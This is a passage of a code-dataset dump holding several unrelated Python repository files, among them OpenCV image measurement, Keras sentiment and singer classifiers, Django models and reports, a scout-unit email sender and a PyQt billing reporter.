cv2\n\ndef midpoint(ptA, ptB):\n\treturn ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)\n\n# load the image to process\nimage = cv2.imread('circles.png')\n\n#Resize img to fit computer screen better\nimage = cv2.resize(image, (int(image.shape[1]/4), int(image.shape[0]/4)))\n\n#Process image --> grayscale --> binarize --> Gaussian Blur\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nbinarized = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ngrayblur = cv2.GaussianBlur(binarized[1], (7, 7), 0)\n\n##Uncomment to display previous 3 operations\n#cv2.imshow(\"Original Image\", image)\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Converted to Grayscale\", gray)\n#cv2.waitKey(0)\n#\n\n#cv2.imshow(\"Binarized\", binarized[1])\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Gaussian Blur\", grayblur)\n#cv2.waitKey(0)\n\n\n\n\nedgedCanny2 = cv2.Canny(grayblur, 50, 100)\n\nedgedDilate = cv2.dilate(edgedCanny2, None, iterations=1)\nedgedErode = cv2.erode(edgedDilate, None, iterations=1)\nimg = edgedCanny2.copy()\n#Show image operations\n#cv2.imshow(\"Canny Edge Detection - blur\", edgedCanny2)\n#cv2.waitKey(0)\n\n\n#Convert latest image back to color to allow colored contour lines\nimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n#Find contours on grayscale image\ncnts = cv2.findContours(edgedCanny2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncnts = cnts[1]\nnewCnts = []\ncircleList = []\n\n#Process contours by arc length and circle size\nfor c in cnts:\n circle = cv2.minEnclosingCircle(c)\n if cv2.arcLength(c,1)>100 and circle[1]>100:\n newCnts.append(c)\n circleList.append(circle)\n\n#Find max radius of circle enclosing the contours\nmaxRadius = 0\nfor radius in circleList:\n if radius[1] > maxRadius:\n maxRadius = radius[1]\n maxCenter = radius[0]\n\n#Draw the max bounding circle\nimg = cv2.circle(img.copy(), (int(maxCenter[0]),int(maxCenter[1])), int(maxRadius), (0,0,255), 3)\n#Draw contours on color image\nimg = cv2.drawContours(img.copy(), newCnts, -1, (0,255,0), 1)\n#Show contours\ncv2.imshow(\"Countour Plot\",img)\ncv2.waitKey(0)\n","repo_name":"mkeranen/CV_Diameter_Measurement","sub_path":"dia_msmt_mk.py","file_name":"dia_msmt_mk.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44678310424","text":"import graphics\nimport math\n\nwin = graphics.GraphWin(\"Graphics Window\", 500, 500)\n\npt0 = graphics.Point(275, 250)\npt30 = graphics.Point(250 + 40 * math.cos(math.pi/6), 250 - 40 * math.sin(math.pi/6))\npt60 = graphics.Point(250 + 60 * math.cos(math.pi/3), 250 - 60 * math.sin(math.pi/3))\npt90 = graphics.Point(250, 200)\npt120 = graphics.Point(250 - (30 * math.cos(math.pi/3)), 250 - (30 * math.sin(math.pi/3)))\npt150 = graphics.Point(250, 250)\n\n\ncir = graphics.Circle(pt0, 5)\ncir2 = graphics.Circle(pt30, 5)\ncir3 = graphics.Circle(pt60, 5)\ncir4 = graphics.Circle(pt90, 5)\ncir5 = graphics.Circle(pt120, 5)\ncir6 = graphics.Circle(pt150, 5)\ncirEnc = graphics.Circle(graphics.Point(250, 250), 100)\n\nlineVert = graphics.Line(graphics.Point(250, 150), graphics.Point(250,350))\nlineHoriz = graphics.Line(graphics.Point(150, 250), graphics.Point(350, 250))\nline30 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 + 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 - (100 * math.sin(math.pi/6))))\nline60 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 + 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 - (100 * math.sin(math.pi/3))))\nline120 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 - 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 + (100 * math.sin(math.pi/3))))\nline150 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 - 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 + (100 * math.sin(math.pi/6))))\n\ncirEnc.draw(win)\ncir.draw(win)\ncir2.draw(win)\ncir3.draw(win)\ncir4.draw(win)\ncir5.draw(win)\ncir6.draw(win)\n\nlineVert.draw(win)\nlineHoriz.draw(win)\nline30.draw(win)\nline60.draw(win)\nline120.draw(win)\nline150.draw(win)\n\ndx = 0.1\ndy = -0.1\ndxDiag = 0.1 * math.sqrt(2) / 2\ndyDiag = 0.1 * math.sqrt(2) / 2\n\nwin.getMouse()\n\nwhile True:\n if cir.getCenter().getX() >= 350:\n dx = -0.1\n dy = 0.1\n dxDiag = 0.1 * math.sqrt(2) / 2\n dyDiag = 0.1 * math.sqrt(2) / 2\n if cir.getCenter().getX() <= 150:\n dx = -dx\n dy = -dy\n dxDiag = -dxDiag\n dyDiag = -dyDiag\n\n cir.move(dx, 0)\n cir2.move(-dx, 0)\n cir3.move(0, dy)\n cir4.move(0, -dy)\n cir5.move(dxDiag, dyDiag)\n cir6.move(-dxDiag, dyDiag)\n\n\n","repo_name":"crosenblatt/Python-Gifs","sub_path":"Circles.py","file_name":"Circles.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25159912456","text":"import pandas as pd\n\nreviews = pd.read_csv(\"IMDB Dataset.csv\")\nreviews.head()\nreviews.shape\n# (50000, 2)\n\nimport re\nfrom sklearn.feature_extraction import text\n\nstop_words = text.ENGLISH_STOP_WORDS\n\ndef clean_review(review, stopwords):\n html_tag = re.compile('<.*?>')\n cleaned_review = re.sub(html_tag, \"\", review).split()\n cleaned_review = [i for i in cleaned_review if i not in stopwords]\n return \" \".join(cleaned_review)\n\n## before cleaning\ntext = reviews.review[0]\nprint(text[:200])\n# One of the other reviewers has mentioned that after watching just 1 Oz episode you'll be hooked. They are right, as this is exactly what happened with me.

The first thing that struck me abo\n\n## after cleaning\ncleaned_text = clean_review(text, stop_words)\nprint(cleaned_text[:200])\n# One reviewers mentioned watching just 1 Oz episode you'll hooked. They right, exactly happened me.The thing struck Oz brutality unflinching scenes violence, set right word GO. Trust me, faint hearted\n\n## cleaning the review column\nreviews[\"cleaned_review\"] = reviews[\"review\"].apply(lambda x: clean_review(x, stop_words))\n\nfrom keras.preprocessing.text import Tokenizer\n\n## maximum words to keep based on frequency \nmax_features = 5000\n## replace out-of-vocab words with this\noov = \"OOV\"\ntokenizer = Tokenizer(num_words = max_features, oov_token = oov)\ntokenizer.fit_on_texts(reviews[\"cleaned_review\"])\n## convert text into integers\ntokenized = tokenizer.texts_to_sequences(reviews[\"cleaned_review\"])\n\nfrom sklearn.preprocessing import LabelEncoder\n\ndef sentiment_encode(df, column, le):\n le.fit(df[column])\n sentiment_le = le.transform(df[column])\n return sentiment_le, le\n\nle = LabelEncoder()\nsentiment_le, le = sentiment_encode(reviews, \"sentiment\", le)\nprint(len(le.classes_))\n# 2\nle.classes_\n# array(['negative', 'positive'], dtype=object)\n\nfrom keras.preprocessing import sequence\n\nmax_len = 500\nXtrain = sequence.pad_sequences(tokenized, maxlen = max_len)\n\nfrom sklearn.model_selection import train_test_split\n\n## we will do the splitting using a random state to ensure same splitting every time\nX_train, X_test, y_train, y_test = train_test_split(Xtrain, sentiment_le, \n test_size = .5,\n random_state = 13)\n \n## importing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Dropout\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\n\n## model parameters\nvocab_size = max_features #5000\nembedding_dims = 128 # dimensions to which text will be represented\nnum_epochs = 3\nnoutput = len(le.classes_) #2 (binary)\n\n## model\nmodel = Sequential()\n# embedding layer (vocab_size is the total number of words in data,\n# then the embedding dimensions we specified, then the maximum length of one review)\nmodel.add(Embedding(vocab_size, embedding_dims, input_length = max_len))\n# CNN\nmodel.add(Conv1D(128, kernel_size = 4, input_shape = (vocab_size, embedding_dims),\n activation = \"relu\"))\n# max pooling layer\nmodel.add(MaxPooling1D(pool_size = 3))\n# bidirectional LSTM\nmodel.add(Bidirectional(LSTM(64, return_sequences = True)))\n# LSTM and droput\nmodel.add(LSTM(32, recurrent_dropout = 0.4))\nmodel.add(Dropout(0.2))\n# 1 neuron output layer and sigmoid activation (binary 0 or 1)\nmodel.add(Dense(noutput - 1, activation = \"sigmoid\"))\n# model summary and layout\nmodel.summary()\n\n# adam optimizer and binary crossentropy\nmodel.compile(loss = \"binary_crossentropy\", metrics = [\"accuracy\"],\n optimizer = \"adam\")\n\nmodel.fit(X_train, y_train, epochs = num_epochs,\n batch_size = 32,\n validation_data = (X_test[:1000], y_test[:1000]),\n verbose = 1)\n\nresults = model.evaluate(X_test[1000:], y_test[1000:])\n# 750/750 [==============================] - 51s 65ms/step - loss: 0.3550 - accuracy: 0.8637\nprint(\"test loss: %.2f\" % results[0])\n# test loss: 0.36\nprint(\"test accuracy: %.2f%%\" % (results[1] * 100))\n# test accuracy: 86.37%","repo_name":"MNoorFawi/sentiment-prediction-using-cnn-and-lstm-in-keras","sub_path":"full_code.py","file_name":"full_code.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73443813872","text":"#Meload librari librosa yang digunakan untuk mfcc\nimport librosa \nimport librosa.feature #librosafeature adalah untuk meload feature dari librosa\nimport librosa.display #mengambil function display pada librosa\nimport glob #adalah modul pada python yang biasa digunakan meload segaala jenis format file salah satunya musik\nimport numpy as np #mengimport numpy sebagai np yang digunakan untuk arry musik\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.utils.np_utils import to_categorical\n\ndef display_mfcc(song): #function dengan impatn song\n y, _ = librosa.load(song) #variable y meload variable song\n mfcc = librosa.feature.mfcc(y) #feature mfcc untuk melakukan konversi audio menjadi bntuk vektor\n\n plt.figure(figsize=(10, 4))\n librosa.display.specshow(mfcc, x_axis='time', y_axis='mel')\n plt.colorbar()\n plt.title(song)\n plt.tight_layout()\n plt.show()\n\ndisplay_mfcc('lagu/viavallen/viavallen_wegahelangan.mp3') #memanggil fungsi display mfcc untuk ploating dari audio yang akan dituju\n\ndisplay_mfcc('lagu/tulus/tulus_adurayu.mp3')\n\ndef extract_features_song(f):\n y, _ = librosa.load(f)\n # get Mel-frequency cepstral coefficients\n mfcc = librosa.feature.mfcc(y)\n # normalize values between -1,1 (divide by max)\n mfcc /= np.amax(np.absolute(mfcc))\n return np.ndarray.flatten(mfcc)[25000:]\n\nextract_features_song('lagu/tulus/tulus_adurayu.mp3')\n\nextract_features_song('lagu/viavallen/viavallen_wegahelangan.mp3')\n\ndef generate_features_and_labels():\n all_features = [] #variabel all feature berisi array yang kosong\n all_labels = [] #variable all label berisi array yang kosong\n\n lagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien'] #variable lagu ini kita sesuaikan dengan nama folder yang ada di gdrive dan berisikan folder yang ada di dalamnya\n for singer in lagu:\n sound_files = glob.glob('lagu/'+singer+'/*.mp3') #mengambil file dari folder lagu dan mengambil semua file yang ada didalannya jga ekstensinya\n print('Processing %d songs by %s ...' % (len(sound_files), singer))\n \n for f in sound_files:\n features = extract_features_song(f)\n all_features.append(features)\n all_labels.append(singer)\n\n # convert labels to one-hot encoding\n label_uniq_ids, label_row_ids = np.unique(all_labels, return_inverse=True)\n label_row_ids = label_row_ids.astype(np.int32, copy=False)\n onehot_labels = to_categorical(label_row_ids, len(label_uniq_ids))\n return np.stack(all_features), onehot_labels\n\nfeatures, labels = generate_features_and_labels()\n\nprint(np.shape(features))\nprint(np.shape(labels))\n\ntraining_split = 0.8\n\nalldata = np.column_stack((features, labels))\n\nnp.random.shuffle(alldata)\nsplitidx = int(len(alldata) * training_split)\ntrain, test = alldata[:splitidx,:], alldata[splitidx:,:]\n\nprint(np.shape(train))\nprint(np.shape(test))\n\ntrain_input = train[:,:-10]\ntrain_labels = train[:,-10:]\n\ntest_input = test[:,:-10]\ntest_labels = test[:,-10:]\n\nprint(np.shape(train_input))\nprint(np.shape(train_labels))\n\nprint(np.shape(test_input))\nprint(np.shape(test_labels))\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(100, input_dim=np.shape(train_input)[1]))\nmodel.add(tf.keras.layers.Activation('relu'))\nmodel.add(tf.keras.layers.Dense(10))\nmodel.add(tf.keras.layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nprint(model.summary())\n\nmodel.fit(train_input, train_labels, epochs=10, batch_size=32,\n validation_split=0.2)\n\nloss, acc = model.evaluate(test_input, test_labels, batch_size=32)\n\nprint(\"Done!\")\nprint(\"Loss: %.4f, accuracy: %.4f\" % (loss, acc))\n\n# save the trained model\nmodel.save(\"singers2.hdf5\")\n\nimport tensorflow as tf \nmodel2 = tf.keras.models.load\nprint(model2.summary())\n\ndef predict(song_path):\n song = np.stack([extract_features_song(song_path)])\n # do the prediction\n prediction = model2.predict(song, batch_size=32)\n\n print(\"Prediction: %s, confidence: %.2f\" % (np.argmax(prediction), np.max(prediction)))\n\npredict('Uts/lagu/tompi/Tompi - Balonku.mp3')\n\npredict('Uts/lagu/tulus/TULUS - Pamit.mp3')\n\nfrom sklearn.metrics import confusion_matrix\npred_labels = model2.predict(test_input)\ncm = confusion_matrix(test_labels.argmax(axis=1), pred_labels.argmax(axis=1))\ncm\n\nimport matplotlib.pyplot as plt\nimport itertools\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n plt.figure(figsize=(6,6), dpi=100)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n #plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n #for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n # plt.text(j, i, format(cm[i, j], fmt),\n # horizontalalignment=\"center\",\n # color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\nimport numpy as np\n\nlagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien']\nplot_confusion_matrix(cm, classes=lagu, normalize=True)\nplt.show()","repo_name":"KecerdasanBuatan17/KB3C","sub_path":"uts/1174062/1174062.py","file_name":"1174062.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4779525646","text":"from django.db import models\n\nclass Book(models.Model):\n title = models.CharField(max_length=200)\n date_publish= models.DateTimeField(default='')\n sammary=models.TextField(blank=True)\n country= models.TextField(blank=True)\n link = models.URLField(blank=True)\n Writer = models.ForeignKey(Writer,on_delete=models.CASCADE,default='')\n def __str__(self):\n return self.title\n\n\n\n class Meta:\n ordering =['title']\n","repo_name":"alaaalshamy/DjangoProject1","sub_path":"DjangoProject/liberary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71680669551","text":"import pandas as pd\n\nfrom utils import Utils\n\n\nclass Parser(object):\n def __init__(self, data: dict, key1: str = '21', key2: str = '22'):\n self._key1 = key1\n self._key2 = key2\n self._data = data\n\n def parse(self):\n items = self._data['table'].items()\n\n region_data = []\n\n for key, value in items:\n obj = dict({})\n obj['code'] = key\n obj['region'] = Utils.get_region_name_by_code(key)\n obj['value1'] = value[self._key1]\n obj['value2'] = value[self._key2]\n\n region_data.append(obj)\n\n return {\n 'time_server': self._data['ts'],\n 'total_nolsatu': float(self._data['chart'][self._key1]),\n 'total_noldua': float(self._data['chart'][self._key2]),\n 'process_tps': float(self._data['progress']['proses']),\n 'total_tps': float(self._data['progress']['total']),\n 'votings': region_data\n }\n\n def parse_to_csv_format(self):\n items = self._data['table'].items()\n res = []\n\n for key, value in items:\n obj = dict({})\n obj[Utils.get_region_name_by_code(key)] = {\n 'code': key,\n 'value1': value[self._key1],\n 'value2': value[self._key2]\n }\n res.append(obj)\n\n return res\n","repo_name":"ebysofyan/pantau","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"679247415","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\ndef usergame_list(request):\n \"\"\"Function to build an HTML report of games by user\"\"\"\n if request.method == 'GET':\n # Connect to project database\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Query for all games, with related user info\n db_cursor.execute(\"\"\"\n SELECT\n g.id,\n g.name,\n g.game_type_id,\n g.num_players,\n g.skill_level,\n u.id user_id,\n u.first_name || ' ' || u.last_name AS full_name\n FROM\n levelupapi_game g\n JOIN\n levelupapi_gamer gr ON g.creator_id = gr.id\n JOIN\n auth_user u ON gr.user_id = u.id\n \"\"\")\n\n dataset = db_cursor.fetchall()\n\n games_by_user = {}\n\n for row in dataset:\n game = Game()\n game.name = row['name']\n game.game_type_id = row['game_type_id']\n game.num_players = row['num_players']\n game.skill_level = row['skill_level']\n\n uid = row['user_id']\n\n # If we've already encountered this user, add this game to their list of games\n if uid in games_by_user:\n games_by_user[uid]['games'].append(game)\n\n # Otherwise add a new key-value pair for this user\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row[\"full_name\"],\n \"games\": [ game ]\n }\n \n # dict.values() is akin to Object.values(obj) in JS\n list_of_users_with_games = games_by_user.values()\n\n # Specify Django template and provide data context\n template = 'users/list_with_games.html'\n context = {\n 'usergame_list': list_of_users_with_games\n }\n\n return render(request, template, context)\n","repo_name":"skratz17/levelup-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6652301045","text":"#!/usr/bin/python2\n\nimport os\nimport getopt\nimport sys\n#import pg\n#import string\nimport dbobj\n#from procs import *\n#import time\n#import datetime\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\n \n\n##############################################################################\ndef main():\n \"\"\"This program is intended to be called from office.py\nObtains the following parameters:\n ou_id\n subject\n msg_body\n user_id - person who sent the message\n\n \"\"\"\n \n error_file = open('/tmp/jim.log', 'w')\n testing = 1\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\")\n\n param = dbobj.paramrec()\n db = dbobj.dbinstance(param.dbname)\n\n ou_id = int(args[0])\n subject = args[1]\n msg_body = args[2]\n user_id = args[3]\n\n if testing:\n error_file.write(\"OU id = %d, subject = '%s', msg_body = '%s', user_id = %s\\n\" % (ou_id, subject, msg_body, user_id))\n\n ourec = dbobj.ourec(db, ou_id)\n if not ourec.found:\n if testing:\n error_file.write('Error: OU not found - OU id = %d\\n' % ou_id)\n return\n \n maillist = []\n\n # get email addresses of members of ou\n mail_by_ou(ourec, maillist, db, error_file)\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n #Get children ous\n children = ourec.child_list()\n for ch in children:\n mail_by_ou(ch, maillist, db, error_file)\n\n #if testing:\n error_file.write('No of Email addr = %d\\n' % len(maillist))\n\n\n \n # Get details of the logged in user\n user = dbobj.adultrec(db, user_id) \n if not user.found:\n error_file.write('Error: User not found - User id = %d\\n' % user_id)\n return\n \n maillist.append(user.email)\n \n # Open link to mail server\n mailserver = smtplib.SMTP(param.smtpserver)\n\n\n #Get the html header\n htmlfile = param.template_dir + '/' + param.email_header\n mf = open(htmlfile)\n html_header = mf.read()\n mf.close()\n\n error_file.write('html opened = %s\\n' % htmlfile)\n\n #Get the footer of the email\n footerfile = param.template_dir + '/' + param.email_footer\n mf = open(footerfile)\n html_footer = mf.read()\n mf.close()\n error_file.write('footer opened = %s\\n' % footerfile)\n\n msg_footer = '
%s' % (param.baseurl, param.pythondir, ourec.ou_id, ourec.name)\n\n error_file.write('Set up mailserver and body\\n')\n\n\n #Cycle through the mail list\n for em in maillist:\n #error_file.write(em)\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = subject\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = em\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n \n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_header + msg_body + msg_footer + html_footer, 'html')\n outer.attach(msgfile)\n \n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n error_file.write('Send email to %s\\n' % em)\n\n # Send me a copy\n # Create the mail message\n outer = MIMEMultipart()\n \n # Mail headers\n outer['Subject'] = 'Copy of email to ' + ourec.name\n #outer['From'] = user.email + \"<%s %s>\" % (user.forename, user.surname)\n outer['From'] = user.email\n outer['To'] = 'scout@west.net.nz'\n outer.preamble = 'Scout unit mail message'\n outer.epilogue = ''\n\n html_body = html_header + 'Subject : %s
Sent by : %s %s
Message body :
%s' %(subject, user.forename, user.surname, msg_body) + html_footer\n\n # Attach the created file to the e-mail.\n msgfile = MIMEText(html_body, 'html')\n outer.attach(msgfile)\n\n #mailserver.set_debuglevel(1)\n mailserver.sendmail(user.email, em, outer.as_string())\n\n\n error_file.write('Finished sending email\\n')\n\n # Finished the loop, close connection to mail server\n mailserver.quit()\n\n error_file.close()\n except:\n error_file = open('/tmp/email_error.log', 'w')\n error_file.write('Error occured')\n error_file.close()\n return\n\n##############################################################################\ndef mail_by_ou(ourec, maillist, db, ef):\n \"\"\"Populates maillist parameter (which must be an array) with unique email addresses of members and parents.\nReceives two parameters\n ourec - the OU being processed\n maillist - the array for email addresses\n\"\"\"\n ef.write('Entered mail_by_ou, ou_id = %d\\n' % ourec.ou_id)\n membs = ourec.member_list(status = 'C')\n\n for s in membs:\n pers = dbobj.scoutrec(db, s.scout_id)\n if pers.found:\n if pers.email is not None and pers.email != '':\n if maillist.count(pers.email) == 0:\n maillist.append(pers.email)\n p1 = dbobj.adultrec(db, pers.parent1)\n if p1.found != 0 and p1.email is not None and p1.email != '':\n if maillist.count(p1.email) == 0:\n maillist.append(p1.email)\n p2 = dbobj.adultrec(db, pers.parent2)\n if p2.found != 0 and p2.email is not None and p2.email != '':\n if maillist.count(p2.email) == 0:\n maillist.append(p2.email)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jimboeri/scout","sub_path":"py/unit-email.py","file_name":"unit-email.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"877893091","text":"__author__ = 'Hk4Fun'\n__date__ = '2018/5/22 23:03'\nimport sys\n\nfrom PyQt5.QtWidgets import (QWidget, QHeaderView, QTableWidgetItem, QInputDialog)\n\nsys.path.append('..')\nfrom AirConditioningV2.ui import ui_Reporter\nfrom AirConditioningV2.ui import ui_Bill\nfrom AirConditioningV2.database import *\nfrom AirConditioningV2.logger import *\nfrom AirConditioningV2.filters import *\n\n\nclass DetailList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.showDetailList()\n\n def showDetailList(self, date=None):\n self.ui.tbDetail.clearContents()\n self.ui.tbDetail.setSortingEnabled(False) # http://doc.qt.io/qt-5/qtablewidget.html#setItem\n self.db.sqlExec('SELECT * FROM detail_list')\n row = 0\n while self.query.next():\n if date and not isEqDate(date, timeFormat(self.query.value(1))): continue\n self.ui.tbDetail.setRowCount(row + 1)\n self.ui.tbDetail.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbDetail.setItem(row, 1, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbDetail.setItem(row, 2, QTableWidgetItem(timeFormat(self.query.value(1))))\n self.ui.tbDetail.setItem(row, 3, QTableWidgetItem(timeFormat(self.query.value(2))))\n self.ui.tbDetail.setItem(row, 4, QTableWidgetItem(durationFormat(self.query.value(1), self.query.value(2))))\n self.ui.tbDetail.setItem(row, 5, QTableWidgetItem(str(self.query.value(4))))\n self.ui.tbDetail.setItem(row, 6, QTableWidgetItem(str(self.query.value(5))))\n self.ui.tbDetail.setItem(row, 7, QTableWidgetItem(str(self.query.value(6))))\n self.ui.tbDetail.setItem(row, 8, QTableWidgetItem(str(self.query.value(7))))\n self.ui.tbDetail.setItem(row, 9, QTableWidgetItem(str(self.query.value(8))))\n self.ui.tbDetail.setItem(row, 10, QTableWidgetItem(isSettle(self.query.value(9))))\n row += 1\n self.ui.tbDetail.setSortingEnabled(True)\n\n def saveDetail(self, client):\n sql = 'INSERT INTO detail_list VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, client.roomId)\n self.query.bindValue(1, int(client.openTime))\n self.query.bindValue(2, int(client.closeTime))\n self.query.bindValue(3, client.userLevel)\n self.query.bindValue(4, client.tempAdjust)\n self.query.bindValue(5, client.tempBackCount)\n self.query.bindValue(6, client.speedAdjust)\n self.query.bindValue(7, round(client.energy, 2))\n self.query.bindValue(8, round(client.cost, 2))\n self.query.bindValue(9, '0') # 单号为0表示还未结算\n self.db.sqlExec()\n\n\nclass BillList():\n def __init__(self, ui, db):\n self.ui = ui\n self.db = db\n self.query = db.query\n self.ui.tbBillList.cellDoubleClicked.connect(self.showBill)\n self.showBillList()\n\n def showBillList(self, date=None):\n self.ui.tbBillList.clearContents()\n self.ui.tbBillList.setSortingEnabled(False)\n self.db.sqlExec('SELECT * FROM bill_list')\n totalIncome = 0\n row = 0\n while self.query.next():\n if date and not isEqDate(date, self.query.value(0)): continue\n self.ui.tbBillList.setRowCount(row + 1)\n self.ui.tbBillList.setItem(row, 0, QTableWidgetItem(self.query.value(0)))\n self.ui.tbBillList.setItem(row, 1, QTableWidgetItem(self.query.value(1)))\n self.ui.tbBillList.setItem(row, 2, QTableWidgetItem(self.query.value(2)))\n self.ui.tbBillList.setItem(row, 3, QTableWidgetItem(mapUserLevel_c2w(self.query.value(3))))\n self.ui.tbBillList.setItem(row, 4, QTableWidgetItem(str(round(self.query.value(4), 2))))\n self.ui.tbBillList.setItem(row, 5, QTableWidgetItem(discountFormat(self.query.value(5))))\n self.ui.tbBillList.setItem(row, 6, QTableWidgetItem(str(round(self.query.value(6), 2))))\n totalIncome += self.query.value(6)\n row += 1\n self.ui.tbBillList.setSortingEnabled(True)\n self.ui.label_totalIncome.setText(str(round(totalIncome, 2)))\n\n def showBill(self, row):\n orderId = self.ui.tbBillList.item(row, 1).text()\n self.bill = Bill(self.db, orderId)\n self.bill.show()\n\n def addBill(self, orderId, roomId, userLevel, cost):\n sql = 'INSERT INTO bill_list(orderID, roomID, userLevel, cost, discount, receive) VALUES (?, ?, ?, ?, ?, ?)'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, orderId)\n self.query.bindValue(1, roomId)\n self.query.bindValue(2, userLevel)\n self.query.bindValue(3, cost)\n self.query.bindValue(4, mapDiscount(userLevel))\n self.query.bindValue(5, cost * mapDiscount(userLevel))\n self.db.sqlExec()\n\n\nclass Bill(QWidget):\n def __init__(self, db, orderId):\n super().__init__()\n self.db = db\n self.query = self.db.query\n self.orderId = orderId\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Bill.Ui_Form()\n self.ui.setupUi(self)\n self.ui.btPrinter.clicked.connect(self.printBill)\n self.showBill()\n\n def showBill(self):\n sql = 'SELECT * FROM bill_list WHERE orderID = ?'\n self.db.sqlPrepare(sql)\n self.query.bindValue(0, self.orderId)\n self.db.sqlExec()\n self.query.next()\n self.ui.label_date.setText(self.query.value(0))\n self.ui.label_orderId.setText(self.query.value(1))\n self.ui.label_roomId.setText(self.query.value(2))\n self.ui.label_userLevel.setText(mapUserLevel_c2w(self.query.value(3)))\n self.ui.label_cost.setText(str(round(self.query.value(4), 2)))\n self.ui.label_discount.setText(discountFormat(self.query.value(5)))\n self.ui.label_receive.setText(str(round(self.query.value(6), 2)))\n\n def printBill(self):\n pass\n\n\nclass Reporter(QWidget):\n def __init__(self, db, server):\n super().__init__()\n self.db = db\n self.server = server\n self.query = self.db.query\n self.initUi()\n\n def initUi(self):\n self.ui = ui_Reporter.Ui_Form()\n self.ui.setupUi(self)\n # resize column both on content and stretch\n header = self.ui.tbDetail.horizontalHeader()\n header.setSectionResizeMode(QHeaderView.Stretch)\n header.setSectionResizeMode(2, 